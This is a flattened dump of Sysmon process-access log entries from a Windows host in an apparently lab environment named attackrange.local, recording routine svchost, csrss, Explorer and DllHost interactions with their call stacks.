13:30:08.810{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4760-6000-2505-000000009A01}4720C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\SHCORE.dll+316d6|C:\Windows\System32\SHCORE.dll+21cbf|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011002Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.810{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4760-6000-2505-000000009A01}4720C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\SHCORE.dll+316d6|C:\Windows\System32\SHCORE.dll+21cbf|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011001Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.779{08A6967A-4288-6000-1000-000000009A01}11362164C:\Windows\system32\svchost.exe{08A6967A-4760-6000-2505-000000009A01}4720C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011000Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.779{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-4760-6000-2505-000000009A01}4720C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010999Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.779{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010998Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.763{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010997Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.763{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010996Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.763{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4760-6000-2505-000000009A01}4720C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010995Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.763{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010994Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.763{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010993Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.763{08A6967A-4750-6000-0205-000000009A01}47883304C:\Windows\system32\csrss.exe{08A6967A-4760-6000-2505-000000009A01}4720C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010992Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.763{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4760-6000-2505-000000009A01}4720C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010991Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.763{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4760-6000-2505-000000009A01}4720C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010990Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.748{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010989Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.732{08A6967A-4753-6000-1105-000000009A01}45042676C:\Windows\system32\taskhostw.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010988Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.717{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010987Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.717{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010986Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.717{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010985Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.685{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010984Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.654{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010983Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.638{08A6967A-4753-6000-0D05-000000009A01}11164952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\TokenBroker.dll+1acfa|C:\Windows\System32\TokenBroker.dll+1d475|C:\Windows\System32\TokenBroker.dll+1d7f9|C:\Windows\System32\TokenBroker.dll+1e8f3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+5086c|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000010982Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.638{08A6967A-4753-6000-0D05-000000009A01}11164952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\TokenBroker.dll+21886|C:\Windows\System32\TokenBroker.dll+1ac23|C:\Windows\System32\TokenBroker.dll+1d475|C:\Windows\System32\TokenBroker.dll+1d7f9|C:\Windows\System32\TokenBroker.dll+1e8f3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+5086c|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000010981Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.545{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010980Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.545{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010979Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.545{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010978Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.545{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010977Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 